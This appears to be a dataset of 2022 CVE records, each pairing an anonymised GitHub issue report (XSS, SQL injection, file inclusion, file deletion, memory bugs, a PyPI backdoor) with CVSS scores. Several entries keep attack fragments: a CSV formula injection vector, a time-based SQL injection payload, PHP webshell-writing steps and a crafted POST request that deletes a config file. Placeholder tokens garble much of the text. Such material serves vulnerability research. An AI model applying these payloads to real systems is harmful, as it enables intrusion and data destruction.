        "description": "Sandbox breakout bug (details omitted). What happened? The details of this bug have been sent to MENTIONTAG by email on March NUMBERTAG This issue only serves to track the fixing process publicly. In short, I've found a bug in Sandboxie that presumably lets an attacker break out of the sandbox. This has yet to be confirmed by the developers, though. To Reproduce Described in the email. Expected behavior Sandboxed programs should not be allowed to escape. What is your Windows edition and version? Windows NUMBERTAG Home NUMBERTAG H2 APITAG NUMBERTAG bit In which Windows account you have this problem? A local or Microsoft account without special changes. Please mention any installed security software Built in realtime protection in Windows NUMBERTAG What version of Sandboxie are you running? Sandboxie Classic NUMBERTAG bit Is it a regression? _No response_ List of affected browsers _No response_ In which sandbox type you have this problem? I only reproduced it with Sandboxie Classic. Is the sandboxed program also installed outside the sandbox? No, it is not installed in the real system. Can you reproduce this problem on an empty sandbox? I can confirm it also on an empty sandbox. Did you previously enable some security policy settings outside Sandboxie? _No response_ Crash dump _No response_ Trace log _No response_ Sandboxie.ini configuration _No response_ Sandboxie Plus.ini configuration (for Plus interface issues) _No response_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28074",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1769",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1769",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2022-03-24T10:15:41Z",
        "description": "\u4e00\u4e9b\u5b89\u5168\u5efa\u8bae\uff0c\u5efa\u8bae\u9690\u85cf. What is version of Halo has the issue NUMBERTAG What database are you using? Other What is your deployment method? Fat Jar Your site address. _No response_ What happened? \u4f5c\u8005\u4f60\u597d\uff0c\u5728\u90e8\u7f72\u73af\u5883\u7684\u8fc7\u7a0b\u4e2d\uff0c\u53d1\u73b0\u4e86\u4e00\u4e9b\u95ee\u9898\u3002 \u5e0c\u671b\u5728\u4e0b\u4e00\u4e2a\u7248\u672c\u4e2d\uff0c\u80fd\u591f\u8fdb\u884c\u4e00\u4e9b\u5b89\u5168\u7684\u5347\u7ea7\u3002 \u5982\u4e0b\uff1a \u5bfc\u51fa\u7684\u6587\u4ef6\u672a\u52a0\u5bc6\uff0c\u53ef\u4ee5\u4fee\u6539\u5185\u5bb9\uff0c\u5b89\u5168\u9690\u60a3\uff1a \u7528\u6237\u5c06\u535a\u5ba2\u5907\u4efd\u5f00\u6e90\u5230\u4e92\u8054\u7f51\uff0c\u906d\u5230\u4fee\u6539\uff0c\u53ef\u80fd\u5bfc\u81f4\u5b58\u50a8\u578bxss FILETAG FILETAG FILETAG json data \u672a\u52a0\u5bc6 \u4f4d\u7f6e\uff1ablog_footer_info \u53ef\u5bfc\u81f4\uff0c\u5176\u4ed6\u4f4d\u7f6e\u4e5f\u4e00\u6837 \u6548\u679c\u5982\u4e0b\uff1a FILETAG \u4fee\u590d\u5efa\u8bae\uff1a \u5bf9\u5907\u4efd\u5185\u5bb9\u8fdb\u884c\u52a0\u5bc6\u3002\u3002\u3002 \u540c\u6837\u7684xss\uff0c\u4e5f\u53ef\u4ee5\u5728\u8be5\u4f4d\u7f6e\u5f97\u5230\u8bc1\u5b9e URLTAG FILETAG FILETAG Relevant log output _No response_ Additional information English report\uff1a \u00b7 FILETAG when i clicked APITAG label\uff0cthe options will be save... URLTAG allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the APITAG label FILETAG NUMBERTAG stored cross site scripting (XSS) vulnerability in The Database Backup feature. FILETAG FILETAG when i clicked APITAG label\uff0cthe json data will be exported. FILETAG this json data allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into after the APITAG option FILETAG if someone import this json data. this payload will be executed FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-28076",
        "Issue_Url_old": "https://github.com/likCodinG/seacms_vul/issues/1",
        "Issue_Url_new": "https://github.com/likcoding/seacms_vul/issues/1",
        "Repo_new": "likCodinG/seacms_vul",
        "Issue_Created_At": "2022-03-24T14:22:00Z",
        "description": "seacms NUMBERTAG ulnerability Execution Command. APITAG in to the background, click System and then click Mail Server APITAG code in any box in the box below, take APITAG as an example, you need to write APITAG if you want to write a sentence Trojan, you can write ${ APITAG a])} (it can also be successfully connected after testing). APITAG APITAG refresh the page directly, or directly access PATHTAG in the root path APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-28085",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/480",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/480",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2022-03-24T12:44:48Z",
        "description": "APITAG heap buffer overflow in function pdf_write_names. Description Whilst experimenting with htmldoc , built from commit NUMBERTAG f NUMBERTAG URLTAG , we are able to induce a vulnerability in function APITAG , using a harness compiled from APITAG . Because there is no bounds checking, a heap based out of bound read will be triggered when the software encounters a malformed file, result in information disclosure or denial of service. Proof of Concept The POC is: poc_heap_overflow1 URLTAG The command is: `./htmldoc webpage t pdf f /dev/null poc_heap_overflow1 The ASAN report is: ERRORTAG Impact This vulnerability is capable of inducing information disclosure or denial of service.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-28096",
        "Issue_Url_old": "https://github.com/zorlan/skycaiji/issues/39",
        "Issue_Url_new": "https://github.com/zorlan/skycaiji/issues/39",
        "Repo_new": "zorlan/skycaiji",
        "Issue_Created_At": "2022-03-25T10:45:07Z",
        "description": "Remote code execution vulnerability in PATHTAG Vulnerability conditions Website Admin permissions Vulnerability details Location: PATHTAG L NUMBERTAG APITAG Code: ERRORTAG Vulnerability key code: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-28101",
        "Issue_Url_old": "https://github.com/turtl/tracker/issues/404",
        "Issue_Url_new": "https://github.com/turtl/tracker/issues/404",
        "Repo_new": "turtl/tracker",
        "Issue_Created_At": "2021-12-13T21:49:44Z",
        "description": "Filter APITAG tags from notes. Notes allow APITAG tag injection. Ie, a note with the content APITAG opens a new browser window to Google. While this problem would happen over person to person sharing and thus the severity is limited (because you generally only share with those you trust) it remains high priority. Special thanks to Rafay Baloch and Muhammad Samak for this report.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.0,
        "impactScore": 6.0,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-28102",
        "Issue_Url_old": "https://github.com/housamz/php-mysql-admin-panel-generator/issues/19",
        "Issue_Url_new": "https://github.com/housamz/php-mysql-admin-panel-generator/issues/19",
        "Repo_new": "housamz/php-mysql-admin-panel-generator",
        "Issue_Created_At": "2022-03-25T20:50:21Z",
        "description": "Cross Site Scripting (XSS) Security Issue . Affected software : php mysql admin panel generator Version : N/A Type of vulnerability : XSS APITAG Site Scripting) Author : s7safe Description: php mysql admin panel generator is susceptible to cross site scripting attacks, allowing malicious users to inject code into web pages, and other users will be affected when viewing web pages . APITAG : login the system FILETAG turn to URLTAG APITAG APITAG Successful FILETAG Reason: Failure to filter or escape special characters leads to vulnerabilities How to fix : escape special characters or filter it . by s7safe",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-28111",
        "Issue_Url_old": "https://github.com/pagehelper/Mybatis-PageHelper/issues/674",
        "Issue_Url_new": "https://github.com/pagehelper/mybatis-pagehelper/issues/674",
        "Repo_new": "pagehelper/mybatis-pagehelper",
        "Issue_Created_At": "2022-06-02T07:20:42Z",
        "description": "\u5173\u4e8e CVETAG \u6f0f\u6d1e\uff0c\u4e0d\u8981\u5728\u53d1 issues \u4e86\uff01\uff01\uff01. APITAG \u5982\u679c\u4f60\u4ece\u524d\u7aef\u4f20\u9012\u4e00\u4e2a SQL \u7528 JDBC \u539f\u751f\u65b9\u5f0f\u6267\u884c\uff0c\u4f60\u662f\u4e0d\u662f\u53d1\u73b0\u4e86\u4e00\u4e2a\u5929\u5927\u7684\u6f0f\u6d1e\uff1f \u5982\u679cJDBC\u4e0d\u505a\u5904\u7406\uff0c\u662f\u4e0d\u662f\u5c31\u4e0d\u7528 JDBC \u4e86\uff1f \u5982\u679c\u8fd9\u4e2a\u6f0f\u6d1e\u4f1a\u5f71\u54cd\u4f60\u4eec\u9879\u76ee\u9009\u62e9\u5206\u9875\u63d2\u4ef6\uff0c\u53ef\u4ee5\u5728\u5f53\u524d issues \u7559\u8a00\uff0c\u5982\u679c\u7559\u8a00\u4eba\u6570\u5f88\u591a\uff0c\u4e0b\u4e2a\u7248\u672c\u53ef\u4ee5\u628a order by \u529f\u80fd\u53bb\u6389\u3002",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28118",
        "Issue_Url_old": "https://github.com/siteserver/cms/issues/3386",
        "Issue_Url_new": "https://github.com/siteserver/cms/issues/3386",
        "Repo_new": "siteserver/cms",
        "Issue_Created_At": "2022-05-02T12:48:09Z",
        "description": "Plugin Vulnerability. The plugin function allows you to execute arbitrary code to obtain server permissions Detail: FILETAG The corresponding CVE number CVETAG has been applied It is hoped that corresponding restrictions can be carried out :)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28352",
        "Issue_Url_old": "https://github.com/weechat/weechat/issues/1763",
        "Issue_Url_new": "https://github.com/weechat/weechat/issues/1763",
        "Repo_new": "weechat/weechat",
        "Issue_Created_At": "2022-03-12T13:03:28Z",
        "description": "Having to re set the APITAG env variable every single session.. Question Everytime I start a session of Weechat and attempt to connect to a server, if the APITAG config option has already been set to anything, or even nothing at all, and even when it ihas been correctly set to APITAG from previous sessions, I always encounter certificate issues with gnutils and thus TLS handshake will fail, disallowing me from making a secure connection to any server (non SSL connections still work, of course) ERRORTAG However , if I then proceed to APITAG to something else , and then after that, set it to the correct value with APITAG , Weechat will handle SSL certificates and connect just fine like it is supposed to. But when I quit and the next time I start Weechat, the same issue shows up again, and then I have to manually set that configuration to something else wrong on purpose, then set it back right again, even when it is already right! I have already tried to find a way to circumvent this issue by starting weechat with a new config APITAG , and even there, the same issue happens after I quit and restart. Right now, my only option to get around this issue is to probably use a script that can APITAG to something different each time I quit the client, and then set the weechat client to run the correct APITAG command option on startup. Still though, I'd rather seek help to see why exactly my APITAG is behaving this way. APITAG version NUMBERTAG OS, distribution and version: APITAG Linu NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.5,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2022-28355",
        "Issue_Url_old": "https://github.com/scala-js/scala-js/issues/4657",
        "Issue_Url_new": "https://github.com/scala-js/scala-js/issues/4657",
        "Repo_new": "scala-js/scala-js",
        "Issue_Created_At": "2022-03-25T23:09:04Z",
        "description": "FILETAG should not provide a cryptographically insecure APITAG implementation. I'm specifically thinking about this section of code: URLTAG The Java NUMBERTAG docs for APITAG state: > Static factory to retrieve a type NUMBERTAG pseudo randomly generated) UUID. The UUID is generated using a cryptographically strong pseudo random number generator. Furthermore, URLTAG states that: > Developers who have not been exposed to RFC NUMBERTAG might naturally opt to invent their own approaches to UUID generation, potentially using APITAG (in TIFU by using APITAG there's an in depth discussion of why a Cryptographically Secure Pseudo Random Number Generator (_CSPRNG_) should be used when generating UUIDs). It's unclear to me how a developer or cross compiling their library or application for Scala.js should become aware that in fact they cannot rely on APITAG for cryptographically strong UUIDs. This seems a lot like a CVE to me. See also discussion in URLTAG PS would be good to set up a security policy at URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28379",
        "Issue_Url_old": "https://github.com/NginxProxyManager/nginx-proxy-manager/issues/1950",
        "Issue_Url_new": "https://github.com/nginxproxymanager/nginx-proxy-manager/issues/1950",
        "Repo_new": "nginxproxymanager/nginx-proxy-manager",
        "Issue_Created_At": "2022-03-24T14:14:30Z",
        "description": "Stored XSS when deleting proxy host. Steps to reproduce NUMBERTAG Login as administrative user NUMBERTAG Create a new proxy host entry with the payload APITAG as domain NUMBERTAG Hit save NUMBERTAG Try to delete the newly added proxy host. XSS payload is executed. FILETAG FILETAG FILETAG Recommendation: Implementing input validation and/or ensuring output sanitization. Risk: Low risk since high privileges are required.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-28448",
        "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/6191",
        "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/6191",
        "Repo_new": "nopsolutions/nopcommerce",
        "Issue_Created_At": "2022-03-19T09:32:47Z",
        "description": "Stored XSS in customer name when customer accessed deny resource and redirect to login page. APITAG version NUMBERTAG Steps to reproduce the problem: FILETAG Inject javascript code to First name or Last name at Customer Info When customer accesses deny resources, for example /admin, server will redirect user to login page and show up notification: APITAG are already logged in as APITAG Name}. You may log in with another account.\". Customer Name is reflected in the response without HTML encoding, and cause XSS when APITAG is called. Note: If admin used Place order (impersonate) feature, customer will execute javascript under admin session.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-28449",
        "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/6192",
        "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/6192",
        "Repo_new": "nopsolutions/nopcommerce",
        "Issue_Created_At": "2022-03-20T08:35:25Z",
        "description": "Unrestricted File Upload in Apply for vendor account feature. APITAG version NUMBERTAG Steps to reproduce the problem: At Apply for vendor account feature, customer could upload arbitrary file, for example file FILETAG and content of submitted form as below: ERRORTAG After admin see Vendor apply info by clicking Edit button , uploaded file will be generated and the final uploaded file has formatted PATHTAG FILETAG id parameter is NUMBERTAG digits number and it is auto increment, therefore it is easy to guess/bruteforce User Input APITAG will be filtered special character, therefore, I just put alphabet characters here to make output unchange Content Type is text/html => Content Type extension is html . One of my final uploaded file is FILETAG Impact: Unrestricted File Upload in Apply for vendor account feature leading to Stored XSS FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28450",
        "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/6194",
        "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/6194",
        "Repo_new": "nopsolutions/nopcommerce",
        "Issue_Created_At": "2022-03-20T12:30:36Z",
        "description": "XSS issue in the APITAG parameter. APITAG version NUMBERTAG Description: A stored cross site scripting (XSS) vulnerability exists when creating a new post of APITAG version NUMBERTAG that allows a remote attacker to execute arbitrary APITAG code at client browser Steps to reproduce the problem: Step NUMBERTAG Create new topic or reply topic with injecting APITAG to APITAG parameter FILETAG Step2: Click a text APITAG at topic that created in step NUMBERTAG to trigger XSS FILETAG Let me know if you require additional information.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-28451",
        "Issue_Url_old": "https://github.com/nopSolutions/nopCommerce/issues/6203",
        "Issue_Url_new": "https://github.com/nopsolutions/nopcommerce/issues/6203",
        "Repo_new": "nopsolutions/nopcommerce",
        "Issue_Created_At": "2022-03-28T08:57:13Z",
        "description": "Possible issue with database backup filenames. APITAG version NUMBERTAG The Maintenance feature in APITAG version NUMBERTAG is vulnerable to path traversal, an user can send the wrong value of parameter APITAG when sending POST request manually",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28461",
        "Issue_Url_old": "https://github.com/lanfei-4/mingyuefusu/issues/1",
        "Issue_Url_new": "https://github.com/lanfei-4/mingyuefusu/issues/1",
        "Repo_new": "lanfei-4/mingyuefusu",
        "Issue_Created_At": "2022-03-28T03:32:02Z",
        "description": "mingyuefusu library management system SQL Injection vulnerability in all version. login in system FILETAG Click the labeled position to capture data packets\u3001use sql time injection to Validation vulnerabilities FILETAG Verify SQL injection vulnerabilities using APITAG FILETAG Code analysis PATHTAG FILETAG PATHTAG The following code does not use APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28462",
        "Issue_Url_old": "https://github.com/201206030/novel-plus/issues/85",
        "Issue_Url_new": "https://github.com/201206030/novel-plus/issues/85",
        "Repo_new": "201206030/novel-plus",
        "Issue_Created_At": "2022-04-04T03:01:19Z",
        "description": "Arbitrary file reading vulnerability exists in the ve APITAG Vulnerable code: ERRORTAG NUMBERTAG alidation vulnerabilities FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28463",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/4988",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/4988",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2022-03-25T05:27:23Z",
        "description": "APITAG heap buffer overflow PATHTAG in APITAG APITAG version NUMBERTAG Operating system Linux Operating system, version and so on Linux d NUMBERTAG f NUMBERTAG ae NUMBERTAG generic APITAG Ubuntu SMP Tue Mar NUMBERTAG UTC NUMBERTAG APITAG Description Hello, We are currently working on fuzz testing feature, and we found a heap use after free on APITAG Steps to Reproduce \u279c oss fuzz git:(master) \u2717 python infra/helper.py reproduce imagemagick encoder_cin_fuzzer PATHTAG APITAG docker run rm privileged i v PATHTAG v PATHTAG t PATHTAG reproduce encoder_cin_fuzzer runs NUMBERTAG FUZZER=encoder_cin_fuzzer + shift + ' FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-28470",
        "Issue_Url_old": "https://github.com/joajfreitas/marcador/issues/5",
        "Issue_Url_new": "https://github.com/joajfreitas/marcador/issues/5",
        "Repo_new": "joajfreitas/marcador",
        "Issue_Created_At": "2022-03-28T11:41:59Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip3 install marcador NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28471",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/49",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/49",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2022-03-25T10:42:12Z",
        "description": "Integer overflow in APITAG resulting in heap overflow in APITAG at APITAG version : master (commit caade NUMBERTAG URLTAG poc : poc URLTAG command : ./ffjpeg e $poc$ Here is the trace reported by ASAN: ERRORTAG This issue is the same as NUMBERTAG but the fix to it NUMBERTAG fa4cf8 URLTAG is not complete. An integer overflow is still possible in line NUMBERTAG In the example below, when APITAG , APITAG which bypasses the check in line NUMBERTAG This will lead to a heap buffer flow in APITAG as in the ASAN report above. URLTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28481",
        "Issue_Url_old": "https://github.com/zvory/csv-safe/issues/7",
        "Issue_Url_new": "https://github.com/zvory/csv-safe/issues/7",
        "Repo_new": "zvory/csv-safe",
        "Issue_Created_At": "2022-03-10T17:08:57Z",
        "description": "More special characters needs to be filtered out for a better security . MENTIONTAG First of all, you have done an amazing job with this gem. It is suggested to filter out more special characters such as | and % Because the current gem could be bypassed with the use of such vector NUMBERTAG A NUMBERTAG cmd|' /C calc'!D2 in older versions. References: URLTAG URLTAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28487",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/723",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/723",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2022-03-28T20:35:50Z",
        "description": "APITAG Format string vulnerability in APITAG function. Describe the bug Tcpreplay version NUMBERTAG contains a memory leakage flaw, CVETAG vulnerability in APITAG function. The highest threat from this vulnerability is to data confidentiality. The inputs required to exploit the vulnerability is unknown. URLTAG Additional context A patch was proposed in the following pull request: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28488",
        "Issue_Url_old": "https://github.com/marc-q/libwav/issues/29",
        "Issue_Url_new": "https://github.com/marc-q/libwav/issues/29",
        "Repo_new": "marc-q/libwav",
        "Issue_Created_At": "2022-03-27T22:15:14Z",
        "description": "Use of uninitialized value in function wav_format_write in libwav.c. Describe the bug An unitialized variable is used in function wav_format_write. The highest threat from this vulnerability is to data confidentiality. The unitialized variable format is copied to the stream pointed by f variable, as illustrated below. URLTAG System info Ubuntu NUMBERTAG LTS, clang version NUMBERTAG latest commit APITAG Steps to reproduce the behavior compile the program with APITAG Run command: APITAG poc URLTAG Output ERRORTAG Note, wav_chunk_write function calls wav_format_write, where it's the bug at.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28505",
        "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/33",
        "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/33",
        "Repo_new": "jflyfox/jfinal_cms",
        "Issue_Created_At": "2022-03-29T08:03:30Z",
        "description": "SQL injection vulnerability exists in APITAG CMS NUMBERTAG SQL injection vulnerability exists in APITAG CMS NUMBERTAG Analysis The vulnerability appears in lines NUMBERTAG of the APITAG FILETAG Here call APITAG to query with the following statement: APITAG When the length of APITAG is not equal to NUMBERTAG go into the if branch and call the APITAG method to concatenate APITAG \uff1a FILETAG The SQL statement after concatenation is as follows: APITAG Moving on, the APITAG parameter is concatenated to the end of the SQL statement String APITAG = APITAG (); defines the source of the APITAG argument APITAG FILETAG APITAG FILETAG The APITAG parameter is the APITAG parameter passed from the front end So you can construct payload to exploit this vulnerability Exploit Maven Startup Environment Vulnerability address: PATHTAG FILETAG Injection parameters: APITAG payload\uff1a ) AND (SELECT NUMBERTAG FROM APITAG woqr FILETAG SQLMAP Injection\uff1a FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-28521",
        "Issue_Url_old": "https://github.com/jorycn/thinkphp-zcms/issues/4",
        "Issue_Url_new": "https://github.com/jorycn/thinkphp-zcms/issues/4",
        "Repo_new": "jorycn/thinkphp-zcms",
        "Issue_Created_At": "2022-03-30T04:11:36Z",
        "description": "There is a file inclusion vulnerability here: APITAG Vulnerability PATHTAG The vulnerability code is as follows: You can see that the incoming file is directly included here, and the file is not filtered FILETAG Vulnerability to reproduce: APITAG create a FILETAG file in the root directory of the website\uff0cof course, this can be any file in the root directory of the website FILETAG APITAG code in the FILETAG file is as follows: FILETAG APITAG url: URLTAG \uff0cuse the post method to pass in $file and $config_array FILETAG APITAG can see that FILETAG is successfully generated in the root directory of the website FILETAG APITAG backdoor tool to connect FILETAG FILETAG Repair suggestion: APITAG incoming files to php suffix APITAG the incoming filename APITAG and filter the content of incoming files",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28522",
        "Issue_Url_old": "https://github.com/jorycn/thinkphp-zcms/issues/5",
        "Issue_Url_new": "https://github.com/jorycn/thinkphp-zcms/issues/5",
        "Repo_new": "jorycn/thinkphp-zcms",
        "Issue_Created_At": "2022-03-30T06:01:31Z",
        "description": "There is a stored xss vulnerability here: APITAG Vulnerability PATHTAG FILETAG Vulnerability to reproduce: APITAG url: URLTAG \uff0cuse the post method to pass in parameter values\uff0cthe specific operation screenshots are as follows: FILETAG APITAG background address: URLTAG \uff0cyou can see the success popup FILETAG Or you can log in to the background, click Extension Tools, and then click Message Management\uff0ca popup will appear next FILETAG Repair suggestion: Use php built in functions such as htmlspecialchars to filter xss vulnerabilities",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-28523",
        "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/17",
        "Issue_Url_new": "https://github.com/neeke/hongcms/issues/17",
        "Repo_new": "neeke/hongcms",
        "Issue_Created_At": "2022-03-31T09:16:53Z",
        "description": "There is an arbitrary file deletion vulnerability here: PATHTAG Vulnerability file: PATHTAG The vulnerability code is as follows: FILETAG Arbitrary file deletion vulnerability could lead to system reinstallation Vulnerability to reproduce: APITAG log in to the background to get cookies APITAG of the code in the FILETAG file is as follows: the following code means that the system can be reinstalled as long as the FILETAG file is deleted APITAG APITAG . 'config/ FILETAG '); if(defined('SYSDIR')){ echo ' APITAG APITAG APITAG APITAG APITAG APITAG APITAG echo $footer; APITAG } APITAG APITAG the packet that deletes the config.php file as follows: APITAG POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Referer: URLTAG Content Length NUMBERTAG Cookie: APITAG DNT NUMBERTAG Connection: close PATHTAG APITAG Repair suggestion: APITAG ../ or ..\\\\ in file variables APITAG allow files in the specified directory to be deleted",
